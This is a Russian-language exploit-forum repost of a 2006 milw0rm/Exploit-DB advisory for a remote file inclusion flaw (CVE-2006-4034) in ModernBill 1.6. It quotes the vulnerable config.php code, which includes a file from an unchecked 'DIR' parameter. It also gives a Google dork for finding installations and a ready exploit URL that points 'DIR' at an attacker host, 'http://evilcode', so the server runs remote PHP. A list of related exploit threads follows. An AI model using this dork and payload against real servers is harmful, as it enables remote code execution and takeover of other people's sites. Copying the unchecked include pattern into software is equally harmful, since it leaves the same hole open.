Exploit ModernBill 1.6 - 'config.php' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2127
Проверка EDB
  1. Пройдено
Автор
SOLPOT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4034
Дата публикации
2006-08-07
Код: 
#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
# contact: [email protected]
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

# milw0rm.com [2006-08-07]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit ModernBill 4.3 - 'user.php' SQL Injection
Ответы
0
Просмотры
318
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting
Ответы
0
Просмотры
296
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
Ответы
0
Просмотры
294
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion
Ответы
0
Просмотры
276
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)
Ответы
0
Просмотры
766
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config
Ответы
0
Просмотры
802
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NTPsec 1.1.2 - 'config' (Authenticated) Out-of-Bounds Write Denial of Service (PoC)
Ответы
0
Просмотры
634
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion
Ответы
0
Просмотры
449
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion
Ответы
0
Просмотры
426
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу